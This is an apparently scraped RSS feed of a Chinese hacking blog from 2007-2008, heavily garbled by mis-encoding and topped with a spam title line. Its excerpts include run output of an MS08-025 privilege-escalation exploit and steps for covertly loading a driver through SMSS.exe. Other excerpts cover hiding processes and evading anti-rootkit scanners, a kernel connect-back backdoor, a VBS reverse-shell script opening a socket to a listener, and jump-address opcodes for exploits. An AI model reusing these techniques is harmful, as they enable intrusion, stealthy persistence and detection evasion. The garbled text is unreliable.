??xml version="1.0" encoding="utf-8" standalone="yes"?>一级视频在线观看视频在线啦啦,日韩午夜视频在线,国产一区二区三区日韩http://www.aygfsteel.com/baicker/category/17621.htmlzh-cnFri, 09 May 2008 08:00:44 GMTFri, 09 May 2008 08:00:44 GMT60改了(jin)个linux下的c代码为windows版本http://www.aygfsteel.com/baicker/archive/2008/05/09/199502.html009009Fri, 09 May 2008 06:51:00 GMThttp://www.aygfsteel.com/baicker/archive/2008/05/09/199502.htmlhttp://www.aygfsteel.com/baicker/comments/199502.htmlhttp://www.aygfsteel.com/baicker/archive/2008/05/09/199502.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/199502.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/199502.htmlWindows的C++没有pthread_tcdQlinux中有个pthread.hQ很多站的VC代码Q都不知道从哪包含来的,shit
|上看到有一个叫 POSIX Threads for Win32 的开源项目给Z(jin)一个功能比较完善的Windows下pthreads API的实现?

  阅读全文

009 2008-05-09 14:51 发表评论
]]>
Win32 C/C++应用E序q移到Linux-q程、线E和׃n内存QZTQ?/title><link>http://www.aygfsteel.com/baicker/archive/2008/05/09/199491.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 09 May 2008 06:33:00 GMT</pubDate><guid>http://www.aygfsteel.com/baicker/archive/2008/05/09/199491.html</guid><wfw:comment>http://www.aygfsteel.com/baicker/comments/199491.html</wfw:comment><comments>http://www.aygfsteel.com/baicker/archive/2008/05/09/199491.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.aygfsteel.com/baicker/comments/commentRss/199491.html</wfw:commentRss><trackback:ping>http://www.aygfsteel.com/baicker/services/trackbacks/199491.html</trackback:ping><description><![CDATA[     摘要: <br>本文的内Ҏ(gu) Win32 APIQ特别是q程、线E和׃n内存服务Q到 POWER ?Linux 的映。本文可以帮助?zhn)定哪种映射服务最适合(zhn)的需要。作者向(zhn)详l介l了(jin)他在UL Win32 C/C++ 应用E序旉到的 API 映射?<br> <br>  <a href='http://www.aygfsteel.com/baicker/archive/2008/05/09/199491.html'>阅读全文</a><img src ="http://www.aygfsteel.com/baicker/aggbug/199491.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.aygfsteel.com/baicker/" target="_blank">009</a> 2008-05-09 14:33 <a href="http://www.aygfsteel.com/baicker/archive/2008/05/09/199491.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>MS08-025 for win2k & win2k3http://www.aygfsteel.com/baicker/archive/2008/04/17/193889.html009009Thu, 17 Apr 2008 15:43:00 GMThttp://www.aygfsteel.com/baicker/archive/2008/04/17/193889.htmlhttp://www.aygfsteel.com/baicker/comments/193889.htmlhttp://www.aygfsteel.com/baicker/archive/2008/04/17/193889.html#Feedback6http://www.aygfsteel.com/baicker/comments/commentRss/193889.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/193889.htmlD:\>ms08025 whoami

MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1

Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmCo  阅读全文

009 2008-04-17 23:43 发表评论
]]>
用C++修改本地安全{略http://www.aygfsteel.com/baicker/archive/2008/01/30/178511.html009009Wed, 30 Jan 2008 05:30:00 GMThttp://www.aygfsteel.com/baicker/archive/2008/01/30/178511.htmlhttp://www.aygfsteel.com/baicker/comments/178511.htmlhttp://www.aygfsteel.com/baicker/archive/2008/01/30/178511.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/178511.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/178511.html[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account] |--------------------------------修改ơ数
"F"=hex:02,00,01,00,00,00,00,00,e0,7c,9e,21,1a,12,c6,01,43,00,00,00,00,00,00,\ 00 ~ 22
00,00,80,d2,16,47,b9,ff,ff,00,80,2c,ab,6d,fe,ff,ff,00,00,00,00,00,00,00,80,\ 23 ~ 47
00,cc,1d,cf,fb,ff,ff,ff,00,cc,1d,cf,fb,ff,ff,ff,00,00,00,00,00,00,00,00,f1,\ 48 ~ 72
03,00,00,00,00,00,00,02,00,18,00,00,  阅读全文

009 2008-01-30 13:30 发表评论
]]>
新手~译驱动http://www.aygfsteel.com/baicker/archive/2008/01/08/173671.html009009Tue, 08 Jan 2008 08:20:00 GMThttp://www.aygfsteel.com/baicker/archive/2008/01/08/173671.htmlhttp://www.aygfsteel.com/baicker/comments/173671.htmlhttp://www.aygfsteel.com/baicker/archive/2008/01/08/173671.html#Feedback1http://www.aygfsteel.com/baicker/comments/commentRss/173671.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/173671.html
我的SDK本来是装好?再装个DDK,是重装pȝ,只要DDK目录q在,重新指定下即?不用重装DDK
DDK目录? f:\WINDDK\3790.1830

以下以HelloWorldZ
-----------------------------------------HelloWorld.h---------------------------------------------------
#ifndef __HELLOWORLD_H__
#define __HELLOWORLD_H__
#include
.................
  阅读全文

009 2008-01-08 16:20 发表评论
]]>
单认识Anti-RootKit(ZT)http://www.aygfsteel.com/baicker/archive/2007/12/29/171547.html009009Sat, 29 Dec 2007 07:09:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/29/171547.htmlhttp://www.aygfsteel.com/baicker/comments/171547.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/29/171547.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171547.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171547.html..........
  阅读全文

009 2007-12-29 15:09 发表评论
]]>
无ȝ驱动加蝲?ZT)http://www.aygfsteel.com/baicker/archive/2007/12/29/171537.html009009Sat, 29 Dec 2007 06:59:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/29/171537.htmlhttp://www.aygfsteel.com/baicker/comments/171537.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/29/171537.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171537.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171537.html?k3的系l下ZwSetSystemInformation止?jin)用h式下加蝲驱动Q只允许SMSS.exe加蝲win32k.sys。于是我们可以利用一下这个特点:(x)
1. 注入SMSS.EXE
2. 打开SeLoadDriverPrivilege权限
3. 把原始的win32k.sys改名
4. 复制我们的驱动到\systemroot\system32?
5. 在SMSS.EXE中加载\\SystemRoot\\System32\\win32k.sys
6. 把\\SystemRoot\\System32\\win32k.sys改名
7. 把原始的win32k.sys文g改名改回?
..............
  阅读全文

009 2007-12-29 14:59 发表评论
]]>
实例解析蠕虫病毒的原?ZT)http://www.aygfsteel.com/baicker/archive/2007/12/28/171227.html009009Fri, 28 Dec 2007 07:44:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/28/171227.htmlhttp://www.aygfsteel.com/baicker/comments/171227.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/28/171227.html#Feedback1http://www.aygfsteel.com/baicker/comments/commentRss/171227.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171227.html
  我们以普通的VB脚本Z来看看:(x)
JavaScript代码

1. Set objFs=CreateObject ("Scripting.FileSystemObject")
2. '创徏一个文件系l对?
3. objFs.CreateTextFile ("C:\virus.txt", 1)
4. '通过文gpȝ对象的方法创Z(jin)一个TXT文g?
.....................
  阅读全文

009 2007-12-28 15:44 发表评论
]]>
软g漏洞分析入门[初shellcode_定位~冲区](ZT)http://www.aygfsteel.com/baicker/archive/2007/12/28/171225.html009009Fri, 28 Dec 2007 07:41:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/28/171225.htmlhttp://www.aygfsteel.com/baicker/comments/171225.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/28/171225.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171225.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171225.html
另外在今天开始之前,我顺便说一下后面的教学计划Q?

我会(x)再用3?ơ的讲来阐qshellcode技术,保大家能够在比较简单的漏洞场景下实现通用、稳定的溢出利用E序QexploitQ?
..........
  阅读全文

009 2007-12-28 15:41 发表评论
]]>
软g漏洞分析入门[初栈溢出D_植入L代码](ZT)http://www.aygfsteel.com/baicker/archive/2007/12/28/171222.html009009Fri, 28 Dec 2007 07:40:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/28/171222.htmlhttp://www.aygfsteel.com/baicker/comments/171222.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/28/171222.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171222.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171222.html
如果(zhn)顺利的学完?jin)前?讲的内容Qƈ成功的完成了(jin)W?讲和W?讲中的实验,那么今天误我来一h战一下劫持有漏洞的进E,q向其植入恶意代码的实验Q相信?zhn)成功完成q个实验后,学习(fn)的兴和自信?j)都会(x)暴增?

开始之前,先简要的回答一下前几讲跟脓(chung)中提出的问题

代码~译头文g问题Q可能是个h?fn)惯问题Q哪怕几行长的程序我也会(x)丢到project里去buildQ而不是用clQ所以没有注意细节。如果你们嫌ȝ(ch)Q不如和我一L(fng)project来buildQ应该没有问题的。否则的话,实验用的E序实在太简单了(jin)Q这么一点小问题自己决绝吧。另外,看到几个同学说ؓ(f)?jin)实验,专门恢复了(jin)古老的VC6.0Q我也感动不已啊Q呵c(din)?
...............
  阅读全文

009 2007-12-28 15:40 发表评论
]]>
软g漏洞分析入门[初栈溢出C_修改E序程](ZT)http://www.aygfsteel.com/baicker/archive/2007/12/28/171221.html009009Fri, 28 Dec 2007 07:39:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/28/171221.htmlhttp://www.aygfsteel.com/baicker/comments/171221.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/28/171221.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171221.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171221.html
信息安全技术是一个对技术性要求极高的领域Q除?jin)扎实的计算机理论基外、更重要的是优秀的动手实践能力。在我看来,不懂二进制就无从谈v安全技术?

~冲区溢出的概念我若q年前已l了(jin)然于胸,不就是个返回地址把CPU指到~冲区的shellcodeM。然而当我开始动手实늚时候,才发现实际中的情况远q比原理复杂?
................
  阅读全文

009 2007-12-28 15:39 发表评论
]]>
软g漏洞分析入门[初栈溢出B_pȝ栈原理](ZT)http://www.aygfsteel.com/baicker/archive/2007/12/28/171217.html009009Fri, 28 Dec 2007 07:34:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/28/171217.htmlhttp://www.aygfsteel.com/baicker/comments/171217.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/28/171217.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171217.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171217.html上节课我们用过数组边界的一个字节把L的标志变量修Ҏ(gu)0Q从而突破了(jin)密码验证E序。?zhn)实验成功了(jin)吗Q没有的话回d完实验在来听今天的课Q?

有几个同学反映编译器的问题,我还是徏议用VC6.0Q因为它build出来的PE最适合初学者领?x)概c(din)而且q门译֊手很重要Q基本上我的实验指导都是按VC6.0来写的,用别的build出来要是有点出入Q实验不成功的话?x)损失学习(fn)积极性滴——实验获得的成就感是学习(fn)最好的动力?
............
  阅读全文

009 2007-12-28 15:34 发表评论
]]>
软g漏洞分析入门[初栈溢出A_初识数组界](ZT)http://www.aygfsteel.com/baicker/archive/2007/12/28/171215.html009009Fri, 28 Dec 2007 07:33:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/28/171215.htmlhttp://www.aygfsteel.com/baicker/comments/171215.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/28/171215.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171215.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171215.html
栈溢出的文章|上q是有不的Q其实优U的也׃三篇Q,原理也不难,读过基本上就能够明白是怎么回事。本ơ讲解将主要集中在动手调试方面,更加着重实c(din)?

l过q??ơ的栈溢出扫Ԍ我们的目标是Q?

领会(x)栈溢出攻ȝ基本原理
能够动手调试易的栈溢出漏z程序,q能够利用漏z执行Q意代码(最易的shellcodeQ?
.............
  阅读全文

009 2007-12-28 15:33 发表评论
]]>
软g漏洞分析入门[引子](ZT)http://www.aygfsteel.com/baicker/archive/2007/12/28/171213.html009009Fri, 28 Dec 2007 07:32:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/28/171213.htmlhttp://www.aygfsteel.com/baicker/comments/171213.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/28/171213.html#Feedback1http://www.aygfsteel.com/baicker/comments/commentRss/171213.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171213.html
从今天开始,准备陆箋发一pd关于软g漏洞斚w基础知识的帖子,包括软g漏洞的研Ih(hun)|研究Ҏ(gu)Q堆栈利用的基础知识Qshellcode的调试方法,漏洞调试Ҏ(gu)Q漏z分析,漏洞挖掘QY件安全性测试等{,此外q将介绍一些metasploit架构和fuzz试斚w的入门知识?

软g漏洞分析Q利用,发掘是当今安全技术界中流砥柱U别话题Q如果?zhn)xqblack hat或者defcon之类的顶U安全技术峰?x)的话,q道我不是在吹牛了(jin)。可惜的是这斚w的中文资料很,偶尔有一比较优U的文章但又不够系l,目前为止也没有Ş成像破解技术这L(fng)讨论风气Q菜鸟们在黑灯瞎火的夜晚瞎折腾,没有交流和指|兴趣像被拔?jin)气弥儿芯的车胎Q很快就泄气?jin)?

虽然漏洞分析与利用与破解在技术上各有侧重点,但逆向基础是共同的。以我个人的l验Q能做crack的朋友只要稍加进修就能入门。就没有Q何汇~基和逆向l验的朋友也不用担心(j)Q因  阅读全文

009 2007-12-28 15:32 发表评论
]]>
?Hook 内核ntoskrnl'sZwQuerySystemInformation隐藏d理器进E名 的一点完?ZT)http://www.aygfsteel.com/baicker/archive/2007/12/27/171009.html009009Thu, 27 Dec 2007 14:12:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/27/171009.htmlhttp://www.aygfsteel.com/baicker/comments/171009.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/27/171009.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171009.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171009.htmlqiweixue 在他的文章里面写的很清楚?
http://bbs.pediy.com/showthread.php?t=36742&highlight=%E9%9A%90%E8%97%8F+%E8%97%8F%E8%BF%9B+%E8%BF%9B%E7%A8%8B

不过他的文章里面Q进E名字是直接写死的,不能通过三层q行传递,而且得到ZwQuerySystemInformation是通过汇编的方法,q样在其他系l上可能?x)有问题Q所以我做了(jin)一些改善如下:(x)
1 通过应用E序进E名字传递进来,可以传递多个进E名字,格式为:(x)qq.exe;taskmgr.exe;
2 通用的方法来得到ZwQuerySystemInformation的地址Q不q这个方法都是从rookit上得来的?
...........
  阅读全文

009 2007-12-27 22:12 发表评论
]]>
让EXE导出函数(ZT)http://www.aygfsteel.com/baicker/archive/2007/12/27/171007.html009009Thu, 27 Dec 2007 14:11:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/27/171007.htmlhttp://www.aygfsteel.com/baicker/comments/171007.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/27/171007.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171007.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171007.html兴趣Q想弄清楚它的实现原理。后来又看到梁肇新的书《编E高手箴a》第278|到的调用
门,觉得都应该差不多?


三种不同的解军_法(原理可能是一L(fng)Q?)Q:(x)

1Q在导出函数声明之前加上__declspec(dllexport)。例Q?
__declspec(dllexport) int Add(int a, int b);
__declspec(dllexport) int Sub(int a, int b);
__declspec(dllexport) int Mul(int a, int b);
__declspec(dllexport) int Div(int a, int b);
..........
  阅读全文

009 2007-12-27 22:11 发表评论
]]>
icesword 驱动部分分析(ZT)http://www.aygfsteel.com/baicker/archive/2007/12/27/171004.html009009Thu, 27 Dec 2007 14:01:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/27/171004.htmlhttp://www.aygfsteel.com/baicker/comments/171004.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/27/171004.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171004.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171004.htmlicesword.exe 装蝲 q个驱动Q这个驱动安装后׃?x)卸载。直到系l重新启动。这可能是因为驱动中调用?
PsSetCreateThreadNotifyRoutine 函数.下面是这个函数在 ddk 中的介绍?
........
  阅读全文

009 2007-12-27 22:01 发表评论
]]>
利用伪造内核文件来l过IceSword的检?ZT)http://www.aygfsteel.com/baicker/archive/2007/12/27/171002.html009009Thu, 27 Dec 2007 13:58:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/27/171002.htmlhttp://www.aygfsteel.com/baicker/comments/171002.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/27/171002.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171002.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171002.html
IceSwordQ以下简UISQؓ(f)?jin)防止一些关键系l函敎ͼ包括所有服务中断表中的函数以及(qing)IS驱动部分要用到的一些关键函敎ͼ(j)?patchQ它直接d内核文gQ以下简U“ntoskrnl.exe”)(j)Q然后自己分析ntoskrnl.exe 的PEl构来获取关键系l函数的原始代码q且把当前内怸所有的关键pȝ函数q原为windows默认状态,q样保证?jin)IS使用到的函数不被patch q。也怽?x)想如果我们把还原后的函数再q行patch不还是能w的q去吗?W者也试过
.....................
  阅读全文

009 2007-12-27 21:58 发表评论
]]>
WIN下获取kernel基址的shellcode探讨(ZT)http://www.aygfsteel.com/baicker/archive/2007/12/27/170998.html009009Thu, 27 Dec 2007 13:43:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/27/170998.htmlhttp://www.aygfsteel.com/baicker/comments/170998.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/27/170998.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/170998.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/170998.html——————————?
1. 查找Kernel32.dll基地址Q?
2. 查找GetProcAddress()函数地址Q?
3. 查找其它API函数地址Q?
4. CreateProcess()Q?
5. q程q接?

我们都知道WINDOWS的系l功能不像UNIX的系l调用那样实玎ͼ׃WINDOWS版本的不断更斎ͼ使得pȝ调用对SHELLCODE几乎起不C用?
但是WINDOWS是靠DLL动态链接库来实玎ͼq就是说Q如果能从KERNEL32.DLL中获取LoadLibrary()和GetProcAddress()函数的地址Q我们就可以调用WINDOWS下的所有函C(jin)?
所以我们需要对KERNEL32.DLLq行地址定位Q这也是本文的目的?
................
  阅读全文

009 2007-12-27 21:43 发表评论
]]>
SEH源码赏析之C?ZT)http://www.aygfsteel.com/baicker/archive/2007/12/27/170994.html009009Thu, 27 Dec 2007 13:36:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/27/170994.htmlhttp://www.aygfsteel.com/baicker/comments/170994.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/27/170994.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/170994.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/170994.html C++E序员对try,catch,throw都应该很熟?zhn)?能知道VC怎么实现它的人就不多?不过|络世界使很多h知道?jin)它与SEH (structured exception handlingQ有密切关系,我也不例?也是在若q年前从|络知道?jin)SEH,q且大致也知道SEH的流E?但是和多Ch一样在我的实践也很直接?SEH,对SEH也就仅限于网l上一些文章的介绍.曄在用WindbgҎ(gu)些Y件作分析,我遇C(jin)断点失效的情?查找资料介绍是SEH中的 Handler清除?jin)调试寄存?在分?....................
  阅读全文

009 2007-12-27 21:36 发表评论
]]>
饶过CAnti-Rookit工具的内核模块扫?ZT)http://www.aygfsteel.com/baicker/archive/2007/12/27/170993.html009009Thu, 27 Dec 2007 13:32:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/27/170993.htmlhttp://www.aygfsteel.com/baicker/comments/170993.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/27/170993.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/170993.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/170993.htmlIcesword 最新版
Gmer最新版
Rootkit unhooker 最新版
DarkSpy 最新版
AVG Anti-rootkit最新版
{等
................
  阅读全文

009 2007-12-27 21:32 发表评论
]]>
TCP版backshell的VBS脚本http://www.aygfsteel.com/baicker/archive/2007/12/22/169590.html009009Sat, 22 Dec 2007 08:19:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/22/169590.htmlhttp://www.aygfsteel.com/baicker/comments/169590.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/22/169590.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/169590.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/169590.html'by 009, baicker@hotmail.com
'date:071221

Dim revdata
set sock=WScript.createobject( "MSWinsock.Winsock" , "WSEvent_" )
set sc=createobject( "WScript.Shell" )
Set fso =CreateObject( "Scripting.FileSystemObject" )
sock.connect "127.0.0.1" , 1234
................

  阅读全文

009 2007-12-22 16:19 发表评论
]]>
在同一个进E空间运行两个程?ZT)http://www.aygfsteel.com/baicker/archive/2007/12/20/169026.html009009Thu, 20 Dec 2007 06:36:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/20/169026.htmlhttp://www.aygfsteel.com/baicker/comments/169026.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/20/169026.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/169026.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/169026.html  众所周知Qbo2k可以在一个指定的q程I间(比如explorer.exeq程)做ؓ(f)一个线E运行。本文试图找ZU方法,使得Lexe都可以在其他q程中以U程q行(当然Q这里说?L"是有条g的,下面?x)讲??
  文简单v见,我把先加载的exeUCؓ(f)宿主Q后加蝲的exeUCؓ(f)客户。对于上面的例子Qexplorer.exe为宿主,bo2k.exe为客戗?
基本知识
  每一个exe都有一个缺省加载基址Q一般都?x400000。如果实际加载基址和缺省基址相同Q程序中的重定位表就不需要修?fixup),否则Q就必须修正重定位表Q?

  阅读全文

009 2007-12-20 14:36 发表评论
]]>
Windows Local Privilege Escalation Vulnerability Exploit(secdrv) for winxp & win2k3http://www.aygfsteel.com/baicker/archive/2007/12/17/168265.html009009Mon, 17 Dec 2007 08:34:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/17/168265.htmlhttp://www.aygfsteel.com/baicker/comments/168265.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/17/168265.html#Feedback5http://www.aygfsteel.com/baicker/comments/commentRss/168265.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/168265.htmlwinxp cn sp2, win2k3 cn sp1 试通过

之前的版本只能xp下用Q这?k3也可以了(jin)Q其实前D|间朋友给q我一个这个漏z的1dayQ但是朋友的东西不能乱发Q这个是自己写的Q发出来大家恶心(j)一下?nbsp; 阅读全文

009 2007-12-17 16:34 发表评论
]]>
VC~译优化讄http://www.aygfsteel.com/baicker/archive/2007/11/16/160929.html009009Fri, 16 Nov 2007 02:20:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/11/16/160929.htmlhttp://www.aygfsteel.com/baicker/comments/160929.htmlhttp://www.aygfsteel.com/baicker/archive/2007/11/16/160929.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/160929.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/160929.html
-优化-
/O1 最化I间 minimize space
/Op[-] 改善点C致?improve floating-pt consistency
/O2 最大化速度 maximize speed
/Os 优选代码空? favor code space
/Oa 假设没有别名 assume no aliasing
/Ot 优选代码速度 favor code speed
/Ob 内联展开Q默?n=0Q?inline expansion (default n=0)
/Ow 假设交叉函数别名 assume cross-function aliasing
/Od 用优化Q默认|(j) disable optimizations (default)
/Ox 最大化选项?/Ogityb2 /Gs) maximum opts. (/Ogityb1 /Gs)
/Og 启用全局优化   阅读全文

009 2007-11-16 10:20 发表评论
]]>
E序多开?/title><link>http://www.aygfsteel.com/baicker/archive/2007/11/07/158863.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Wed, 07 Nov 2007 08:54:00 GMT</pubDate><guid>http://www.aygfsteel.com/baicker/archive/2007/11/07/158863.html</guid><wfw:comment>http://www.aygfsteel.com/baicker/comments/158863.html</wfw:comment><comments>http://www.aygfsteel.com/baicker/archive/2007/11/07/158863.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.aygfsteel.com/baicker/comments/commentRss/158863.html</wfw:commentRss><trackback:ping>http://www.aygfsteel.com/baicker/services/trackbacks/158863.html</trackback:ping><description><![CDATA[     摘要: 使用OD反汇~修改NateOnQ虽然很ȝ(ch)Q最l还是搞定了(jin)Q后来发现网上有D代码,直接可以实现E序多开Q测试了(jin)MSN、NateOn没问题,代码如下Q?<br> <br>.386 <br>.model flat, stdcall <br>option casemap :none <br> <br>include windows.inc <br>include user32.inc <br>include kernel32.inc <br>includelib user32.lib <br>includelib kernel32.lib <br>............ <br> <br>  <a href='http://www.aygfsteel.com/baicker/archive/2007/11/07/158863.html'>阅读全文</a><img src ="http://www.aygfsteel.com/baicker/aggbug/158863.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.aygfsteel.com/baicker/" target="_blank">009</a> 2007-11-07 16:54 <a href="http://www.aygfsteel.com/baicker/archive/2007/11/07/158863.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>一个简单的Linux内核后门原型(ZT)http://www.aygfsteel.com/baicker/archive/2007/10/25/155822.html009009Thu, 25 Oct 2007 04:20:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/10/25/155822.htmlhttp://www.aygfsteel.com/baicker/comments/155822.htmlhttp://www.aygfsteel.com/baicker/archive/2007/10/25/155822.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/155822.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/155822.html/*
* Kernel mode connect backdoor,haha~
*
* just a demo module to teach you how to write a backdoor in kernel mode,
* i belive you can add more code to make it strong and powerful,wulala.
*
* by wzt <wzt#xsec.org>
*
*/
  阅读全文

009 2007-10-25 12:20 发表评论
]]>
VBS解决l端H口中特D快捷键问题http://www.aygfsteel.com/baicker/archive/2007/10/15/153033.html009009Mon, 15 Oct 2007 09:27:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/10/15/153033.htmlhttp://www.aygfsteel.com/baicker/comments/153033.htmlhttp://www.aygfsteel.com/baicker/archive/2007/10/15/153033.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/153033.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/153033.html使用SendKeys搞定
例如呼出Cain使用果如下脚本:(x)Q?
Set WshShell= Wscript.CreateObject("Wscript.Shell")
Wscript.Sleep 1500
WshShell.SendKeys "%{PGUP}"

以下位SendKeys的相关用方法等
............

  阅读全文

009 2007-10-15 17:27 发表评论
]]>
一些opcodes(ZT)http://www.aygfsteel.com/baicker/archive/2007/10/11/152062.html009009Thu, 11 Oct 2007 07:49:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/10/11/152062.htmlhttp://www.aygfsteel.com/baicker/comments/152062.htmlhttp://www.aygfsteel.com/baicker/archive/2007/10/11/152062.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/152062.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/152062.html一些opcodes
by axis
2007-03-28

q日在写exploit的时候需要用C些其他语a的call ebx的蟩转地址Q但是metasploit的opcode DB没有包括J体中文、日文、韩文机器的跌{地址Q所以费?jin)点旉攉了(jin)下Q在q里要感谢傲提供的机器l我L地址。现在脓(chung)到这里,方便大家?


体中文windows的通用跌{地址Q?2k/XP/2k3)
0x7ffa45f3 jmp ecx \xff\xe1
0x7ffa4967 jmp ebp \xff\xe5
0x7ffa4a1b jmp ebx \xff\xe3
..................
  阅读全文

009 2007-10-11 15:49 发表评论
]]>
TCP 相关参数解释http://www.aygfsteel.com/baicker/archive/2007/09/13/144765.html009009Thu, 13 Sep 2007 03:03:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/09/13/144765.htmlhttp://www.aygfsteel.com/baicker/comments/144765.htmlhttp://www.aygfsteel.com/baicker/archive/2007/09/13/144765.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/144765.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/144765.html默认值是5
对于一个新接,内核要发送多个 SYN q接h才决定放弃。不应该大于255Q默认值是5Q对应于180U左x间?对于大负载而物理通信良好的网l而言,q个值偏?可修改ؓ(f)2.q个g仅是针对对外的连?对进来的q接,是由tcp_retries1 军_?

tcp_synack_retries QINTEGER
默认值是5
对于q端的连接请求SYNQ内怼(x)发送SYN Q?ACK数据报,以确认收C一?SYNq接h包。这是所谓的三次握手( threeway handshake)机制的第二个步骤。这里决定内核在攑ּq接之前所送出?SYN+ACK 数目。不应该大于255Q默认值是5Q对应于180U左x间?可以Ҏ(gu)上面?tcp_syn_retries 来决定这个?

tcp_keepalive_time QINTEGER
默认值是7200(2时)
当keepalive打开的情况下QTCP发送keepalive消息的频率?׃目前|络  阅读全文

009 2007-09-13 11:03 发表评论
]]>
